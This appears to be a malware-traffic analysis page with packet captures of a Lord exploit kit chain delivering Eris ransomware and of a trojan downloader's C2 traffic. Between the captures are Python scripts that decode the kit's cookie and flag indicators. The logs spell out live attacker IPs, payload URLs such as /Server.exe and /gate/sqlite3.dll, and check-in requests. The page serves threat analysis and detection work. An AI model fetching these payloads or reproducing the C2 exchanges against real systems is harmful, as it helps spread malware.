Lord Exploit Kit Exploiting Flash Vulnerability Delivering Eris Ransomware PCAP File Download Traffic Sample

2019-08-02 10:46:29.501586 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E..m.y@…..
..e…….PM….Hg.P…….GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 57189bbb.ngrok.io

2019-08-02 10:46:29.501716 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 326, win 64240, length 0
E..(……U…..
..e.P…Hg.M..$P…l…
2019-08-02 10:46:29.666953 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………PB….
..e.P…Hg.M..$P…….HTTP/1.1 200 OK
Date: Fri, 02 Aug 2019 14:46:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91




2019-08-02 10:46:31.239216 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [.], ack 21872, win 64240, length 0
E..(..@…..
..e…….PM….H.tP…….
2019-08-02 10:46:31.297932 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1799:2571, ack 21872, win 64240, length 772: HTTP: GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
E..,..@…..
..e…….PM….H.tP…OC..GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://57189bbb.ngrok.io/?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3
x-flash-version: 28,0,0,161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:46:31.298032 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 2571, win 64240, length 0
E..(……U…..
..e.P…H.tM…P…….
2019-08-02 10:46:31.441240 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 21872:23332, ack 2571, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………P…..
..e.P…H.tM…P…+…HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Date: Fri, 02 Aug 2019 14:46:30 GMT
Transfer-Encoding: chunked

2475
FWS$u$..x……p…..D………..application/x-shockwave-flashAdobe Flex 4 Applicationhttp://www.adobe.com/products/flexujwkgkcujwkgkcENSep 15, 2014.D…<.C….Z
………..Z……….e….

2019-08-02 10:47:11.656373 IP 10.8.2.101.49175 > 3.14.212.173.80: Flags [P.], seq 1:724, ack 1, win 64240, length 723: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E…..@…..
..e…….PjTPv….P…>…GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:47:11.656449 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [.], ack 724, win 64240, length 0
E..(.R….PV….
..e.P……jTSIP….a..
2019-08-02 10:47:11.842604 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [P.], seq 1:189, ack 724, win 64240, length 188: HTTP: HTTP/1.1 302 Found
E….T….O…..
..e.P……jTSIP…I…HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: http://google.com
Date: Fri, 02 Aug 2019 14:47:11 GMT
Content-Length: 40

Found.

2019-08-02 10:46:31.800847 IP 10.8.2.101.49164 > 81.171.31.247.4567: Flags [P.], seq 1:133, ack 1, win 64240, length 132
E…..@…{.
..eQ……….`.2.”P….+..GET /Server.exe HTTP/1.1
User-Agent: wininet
Host: 81.171.31.247:4567
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-02 10:46:31.800983 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], ack 133, win 64240, length 0
E..(……..Q…
..e…..2.”….P…G…
2019-08-02 10:46:31.977210 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [P.], seq 1:326, ack 133, win 64240, length 325
E..m……..Q…
..e…..2.”….P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 1803776
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.176216669380665; path=/; HttpOnly
ETag: 60A4822263437E51F0D4844D638C4DFA
Last-Modified: Fri, 02 Aug 2019 12:38:10 GMT
Content-Disposition: attachment; filename="Server.exe";

2019-08-02 10:46:34.864608 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 601786:603246, ack 133, win 64240, length 1460
[binary payload of Server.exe omitted]
2019-08-02 10:46:34.864636 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 603246:604706, ack 133, win 64240, length 1460
[binary payload of Server.exe omitted]
2019-08-02 10:46:34.864652 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 604706:606166, ack 133, win 64240, length 1460
[binary payload of Server.exe omitted]
2019-08-02 10:46:34.864666 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 606166:607626, ack 133, win 64240, length 1460
[binary payload of Server.exe omitted]

2019-08-02 10:46:41.513341 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1:304, ack 1, win 64240, length 303: HTTP: POST /api/v1/check HTTP/1.1
E..W..@…..
..e..P0…P..%..>C.P….K..POST /api/v1/check HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 26
Accept-Encoding: gzip

{"uid":"d708005f8b8c91d1"}
2019-08-02 10:46:50.050263 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 1:466, ack 304, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….I……..P0
..e.P…>C…&0P…q|..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:49 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=2ri00afk3bqb48pn4fg6sde643; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
expires: 0

{"response":"","code":0}

2019-08-02 10:46:50.050886 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [.], seq 304:1764, ack 466, win 63775, length 1460: HTTP: POST /api/v1/sync HTTP/1.1
E…..@…..
..e..P0…P..&0.>E.P…….POST /api/v1/sync HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 1844
Accept-Encoding: gzip

[binary body of the POST /api/v1/sync request omitted (Content-Length 1844, continues in the next segment)]
2019-08-02 10:46:50.050909 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1764:2426, ack 466, win 63775, length 662: HTTP
[binary continuation of the request body omitted]
2019-08-02 10:46:50.050978 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 1764, win 64240, length 0
E..(.J……..P0
..e.P…>E…+.P….f..
2019-08-02 10:46:50.051038 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 2426, win 64240, length 0
E..(.K……..P0
..e.P…>E….zP…….
2019-08-02 10:46:58.858491 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 466:931, ack 2426, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….N……..P0
..e.P…>E….zP…W…HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:58 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=s59ap5rdus4stk4ds1i5hfsmh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
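
The session cookie the landing page sets, visible on the SWF request and again on the second visit above, decodes to the kit's own bookkeeping. The script below is an added example written for this page, not code from the original post or from the kit. It assumes the cookie uses the gorilla/securecookie layout common to Go web applications (base64 of `timestamp|base64url(gob-encoded value)|HMAC-SHA256`) and implements only as much of Go's gob wire format as is needed to read a map with string keys and values. The cookie string is the one captured above; the server's hash key is unknown, so verify_mac can only be exercised with a key you supply.

```python
import base64
import hashlib
import hmac

# Cookie value exactly as captured on the SWF request above (not constructed).
LORD_COOKIE = (
    "MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdj"
    "M1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01K"
    "Z0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVa"
    "d3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8"
    "UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU="
)


def split_securecookie(cookie):
    """Outer layer: base64 of b"<unix ts>|<base64url gob>|<raw mac>". The raw mac may contain '|',
    so split at most twice from the left."""
    raw = base64.urlsafe_b64decode(cookie)
    ts, value, mac = raw.split(b"|", 2)
    value = base64.urlsafe_b64decode(value + b"=" * (-len(value) % 4))
    return int(ts), value, mac


def gob_uint(buf, pos):
    """gob unsigned int: one byte if below 0x80, otherwise (256 - byte) big-endian bytes follow."""
    b = buf[pos]
    if b < 0x80:
        return b, pos + 1
    n = 0x100 - b
    return int.from_bytes(buf[pos + 1:pos + 1 + n], "big"), pos + 1 + n


def gob_int(buf, pos):
    """gob signed int: zigzag-encoded unsigned int."""
    u, pos = gob_uint(buf, pos)
    return (-(u >> 1) - 1 if u & 1 else u >> 1), pos


def gob_string(buf, pos):
    n, pos = gob_uint(buf, pos)
    return buf[pos:pos + n].decode("latin-1"), pos + n


def gob_interface(buf, pos):
    """Interface element: concrete type name, type id, byte length, then the value bytes."""
    name, pos = gob_string(buf, pos)
    _type_id, pos = gob_int(buf, pos)
    n, pos = gob_uint(buf, pos)
    body = buf[pos:pos + n]
    if name != "string":
        return "<%s:%s>" % (name, body.hex()), pos + n
    # A non-struct top-level value is preceded by a zero delta byte.
    s, _ = gob_string(body, 1 if body[:1] == b"\x00" else 0)
    return s, pos + n


def decode_gob_map(gob):
    """Read a gob stream holding one map[interface{}]interface{} with string keys and values.
    Messages are length-prefixed; a negative type id marks a type definition, which is skipped."""
    pos = 0
    while pos < len(gob):
        mlen, pos = gob_uint(gob, pos)
        msg, pos = gob[pos:pos + mlen], pos + mlen
        type_id, i = gob_int(msg, 0)
        if type_id < 0:
            continue
        _delta, i = gob_uint(msg, i)   # zero delta: top-level non-struct value
        count, i = gob_uint(msg, i)    # number of map entries
        out = {}
        for _ in range(count):
            k, i = gob_interface(msg, i)
            v, i = gob_interface(msg, i)
            out[k] = v
        return out
    return {}


def decode_lord_cookie(cookie):
    ts, gob, mac = split_securecookie(cookie)
    return {"issued": ts, "mac_len": len(mac), "values": decode_gob_map(gob)}


def verify_mac(cookie, name, hash_key):
    """Recompute securecookie's HMAC-SHA256 over b"name|ts|value". The key for this sample is unknown."""
    raw = base64.urlsafe_b64decode(cookie)
    ts, value, mac = raw.split(b"|", 2)
    expect = hmac.new(hash_key, b"|".join([name.encode(), ts, value]), hashlib.sha256).digest()
    return hmac.compare_digest(expect, mac)


if __name__ == "__main__":
    print(decode_lord_cookie(LORD_COOKIE))
```

Decoded, the value map reads CVE=CVE-2018-4878, LNK=http://81.171.31.247:4567/Server.exe, EXT=SWF, CFG=EXPLOIT, and the timestamp 1564757190 is 14:46:30 GMT, matching the Date headers; the LNK entry is exactly the URL the victim fetches a second later. Note the CVE label: Flash 28.0.0.161, the build the client reports in x-flash-version, is the release that patched CVE-2018-4878 (APSB18-03) but predates the 32.0.0.101 fix for CVE-2018-15982, so the cookie's label does not match the vulnerability the client is actually exposed to.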

New Lord Exploit Kit (EK) Exploiting Flash Found in the Wild: PCAP Download Traffic Sample Analysis

A newly identified exploit kit is targeting vulnerable versions of Adobe's Flash Player, Malwarebytes security researchers say.

Dubbed "Lord," the exploit kit (EK) was first identified by Virus Bulletin's Adrian Luca. It surfaced in a malvertising chain running through the PopCash ad network.

The EK relies on a compromised website to redirect visitors to its landing page. The landing page was initially rudimentary and served in clear text; the operators quickly moved to obfuscate it.

The landing page contains a function that checks for the presence of Flash Player and then attempts to exploit CVE-2018-15982. One thing that sets Lord EK apart from other kits is its use of the ngrok tunnelling service to mint throwaway hostnames, which produces unusual-looking URLs. Source: https://www.securityweek.com/new-lord-exploit-kit-emerges

Those details line up with the capture above: the SWF request carries x-flash-version: 28,0,0,161, a build older than 32.0.0.101 (the release that fixed CVE-2018-15982); the landing page is served from 57189bbb.ngrok.io; the follow-on executable, Server.exe, is fetched from an HFS instance on 81.171.31.247:4567 with a bare "wininet" User-Agent; the ransomware check-in goes to a .onion hostname through the onion.pet clearnet gateway; and a second request for the same landing page URL on a new connection is answered with a 302 to http://google.com, which an analyst replaying the URL should expect to see instead of the exploit.
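
A parser over the dumps on this page, as an added example rather than anything from the original post or from Malwarebytes: it groups tcpdump -A lines into HTTP messages and applies rules for the indicators the analysis above names (an ngrok hostname, a Flash build older than the 32.0.0.101 fix for CVE-2018-15982 asking for a SWF, an executable pulled with WinINet's bare User-Agent from a bare-IP host, an HFS file server, and a .onion check-in through the onion.pet Tor2web-style gateway). SAMPLE is constructed from request and response lines lifted from the capture with payload bytes and most headers left out; the rule names and the 32.0.0.101 threshold are this example's own.

```python
import re

# Constructed sample: packet lines and HTTP start lines/headers copied from the tcpdump -A
# dumps on this page, payload bytes omitted. Every message begins with its packet line.
SAMPLE = """\
2019-08-02 10:46:29.501586 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 57189bbb.ngrok.io

2019-08-02 10:46:31.297932 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1799:2571, ack 21872, win 64240, length 772: HTTP: GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
x-flash-version: 28,0,0,161
Host: 57189bbb.ngrok.io

2019-08-02 10:46:31.441240 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 21872:23332, ack 2571, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash

2019-08-02 10:46:31.800847 IP 10.8.2.101.49164 > 81.171.31.247.4567: Flags [P.], seq 1:133, ack 1, win 64240, length 132
GET /Server.exe HTTP/1.1
User-Agent: wininet
Host: 81.171.31.247:4567

2019-08-02 10:46:31.977210 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [P.], seq 1:326, ack 133, win 64240, length 325
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: HFS 2.3m
Content-Disposition: attachment; filename="Server.exe";

2019-08-02 10:46:41.513341 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1:304, ack 1, win 64240, length 303: HTTP: POST /api/v1/check HTTP/1.1
POST /api/v1/check HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
"""

PKT_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP (\S+) > (\S+):")
REQ_RE = re.compile(r"^(GET|POST|HEAD|PUT) (\S+) HTTP/1\.[01]$")
RSP_RE = re.compile(r"^HTTP/1\.[01] (\d{3})")
HDR_RE = re.compile(r"^([A-Za-z0-9-]+): ?(.*)$")

# First Flash Player build patched for CVE-2018-15982 (APSB18-42); anything below is exposed.
FLASH_FIXED = (32, 0, 0, 101)
BARE_IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


def parse_tcpdump_http(text):
    """Group tcpdump -A lines into HTTP messages attached to the packet line that precedes them."""
    msgs, cur = [], None
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if m:
            cur = {"ts": m.group(1), "src": m.group(2), "dst": m.group(3), "kind": None, "headers": {}}
            msgs.append(cur)
            continue
        if cur is None:
            continue
        r = REQ_RE.match(line)
        if r:
            cur["kind"], cur["method"], cur["uri"] = "request", r.group(1), r.group(2)
            continue
        s = RSP_RE.match(line)
        if s:
            cur["kind"], cur["status"] = "response", int(s.group(1))
            continue
        h = HDR_RE.match(line)
        if h and cur["kind"]:
            cur["headers"][h.group(1).lower()] = h.group(2)
    return [m for m in msgs if m["kind"]]   # drop pure ACK/data segments with no start line


def triage(msgs):
    """Apply indicator rules drawn from the chain above; returns (timestamp, flow, rule) tuples."""
    hits = []
    for m in msgs:
        h, flow = m["headers"], "%s > %s" % (m["src"], m["dst"])
        host = h.get("host", "")
        if m["kind"] == "request":
            if host.endswith(".ngrok.io"):
                hits.append((m["ts"], flow, "landing page reached through an ngrok tunnel hostname"))
            if "x-flash-version" in h:
                ver = tuple(int(x) for x in h["x-flash-version"].split(","))
                if ver < FLASH_FIXED:
                    hits.append((m["ts"], flow, "Flash %s fetching SWF: older than 32.0.0.101, exposed to CVE-2018-15982"
                                 % ".".join(map(str, ver))))
            if h.get("user-agent", "").lower() == "wininet" and m["uri"].lower().endswith(".exe"):
                hits.append((m["ts"], flow, "WinINet (non-browser) download of an executable"))
            if BARE_IP_HOST.match(host):
                hits.append((m["ts"], flow, "Host header is a bare IP address: %s" % host))
            if host.endswith(".onion.pet"):
                hits.append((m["ts"], flow, "check-in to a .onion service via the onion.pet clearnet gateway"))
        else:
            if h.get("content-type", "").startswith("application/x-shockwave-flash"):
                hits.append((m["ts"], flow, "SWF returned to the client"))
            if h.get("server", "").startswith("HFS"):
                hits.append((m["ts"], flow, "payload served by HTTP File Server (HFS)"))
    return hits


if __name__ == "__main__":
    for ts, flow, rule in triage(parse_tcpdump_http(SAMPLE)):
        print(ts, flow, rule)
```

Run against the sample this yields eight hits in timestamp order, which is the whole chain: landing page, vulnerable Flash requesting the SWF, SWF delivered, WinINet fetch of Server.exe from a bare-IP HFS host, and the .onion check-in. The timestamps are the capture host's local time; the Date headers are GMT and run four hours ahead, so correlate on the packet timestamps, not the server clock.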

2019-08-01 13:19:06.834029 IP 10.8.1.102.65094 > 10.8.1.1.53: 46499+ A? 7b2cdd48.ngrok.io. (35)
E..?.s….#.
..f
….F.5.+……………7b2cdd48.ngrok.io…..
2019-08-01 13:19:06.891928 IP 10.8.1.1.53 > 10.8.1.102.65094: 46499 1/0/0 A 3.17.202.129 (51)
E..O!……U

..f.5.F.;……………7b2cdd48.ngrok.io…………………
2019-08-01 13:19:06.892846 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [S], seq 3866516344, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.t@…!P
..f…….P.v[x…… .s……………
2019-08-01 13:19:06.940656 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [S.], seq 2902076389, ack 3866516345, win 64240, options [mss 1460], length 0
E..,!…..?…..
..f.P….+..v[y`………..
2019-08-01 13:19:06.940887 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [.], ack 1, win 64240, length 0
E..(.w@…!Y
..f…….P.v[y..+.P…….
2019-08-01 13:19:06.941145 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
E..m.x@… .
..f…….P.v[y..+.P…….GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 7b2cdd48.ngrok.io

2019-08-01 13:19:06.941243 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], ack 326, win 64240, length 0
E..(!…..?…..
..f.P….+..v.P….t..
2019-08-01 13:19:07.100312 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E…!…..:E….
..f.P….+..v.P….-..HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 17:19:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91



POST /gate/log.php 31.210.171.200 Malware Dropper Trojan Downloader PCAP File Download Traffic Sample

2019-05-29 23:39:48.912311 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3097589712:3097590130, ack 2503829794, win 16425, length 418: HTTP: GET /1.exe HTTP/1.1
E…..@…..
.
.
.
.. .P..w..=i”P.@)….GET /1.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-29 23:39:49.588931 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 109501:110961, ack 418, win 237, length 1460: HTTP
E…..@.@…
.
.
.
[binary payload of 1.exe omitted; readable fragments in this segment are Delphi VCL RTTI strings: TColor, EInvalidGraphic, EInvalidGraphicOperation, TFontPitch, TFontName, TFontCharset, TFontStyle, TFontStyles, TPenStyle, TPenMode, Graphics]
2019-05-29 23:39:49.590576 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 173741:175201, ack 418, win 237, length 1460: HTTP
[binary payload of 1.exe omitted]
2019-05-29 23:40:00.458551 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 1054931223:1054931413, ack 2808420310, win 16425, length 190: HTTP: POST /gate/log.php HTTP/1.1
E…..@…..
.
……$.P>….e..P.@)….POST /gate/log.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Host: 31.210.171.200

2019-05-29 23:40:00.458560 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 190:345, ack 1, win 16425, length 155: HTTP
E…..@…..
.
……$.P>….e..P.@).2..params=Ym90X2lkPUYyQkMyQjBCLUM3MjYtNEVBMi04RjdELTVDMzA1NEQ4RkExRl9yeTR3biZjb25maWdfaWQ9NTkwMzI0ZDZkMzE1YjBmMDdmMDFkNjlkZWQ0MGNkYTM4NmZiMDk0NiZkYXRhPW51bGw=
2019-05-29 23:40:00.724098 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.o@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{"url":"http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate","attachment_url":"http://31.210.171.200/gate/sqlite3.dll","libraries":"http://31.210.171.200/gate/libs.zip","ip":"73.135.186.44","config":{"masks":null,"loader_urls":null}}
0

2019-05-29 23:40:01.027541 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.p@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{"url":"http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate","attachment_url":"http://31.210.171.200/gate/sqlite3.dll","libraries":"http://31.210.171.200/gate/libs.zip","ip":"73.135.186.44","config":{"masks":null,"loader_urls":null}}

2019-05-29 23:40:01.135113 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 2907559582:2907559879, ack 1455228641, win 16425, length 297: HTTP: GET /gate/sqlite3.dll HTTP/1.1
E..Q..@….Q
.
……%.P.M..V…P.@)i…GET /gate/sqlite3.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:03.662144 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 297:591, ack 917003, win 65335, length 294: HTTP: GET /gate/libs.zip HTTP/1.1
E..N..@….V
.
……%.P.M..V…P..7B…GET /gate/libs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:05.273384 IP 31.210.171.200.80 > 10.1.10.162.49189: Flags [P.], seq 3744744:3745578, ack 591, win 245, length 834: HTTP
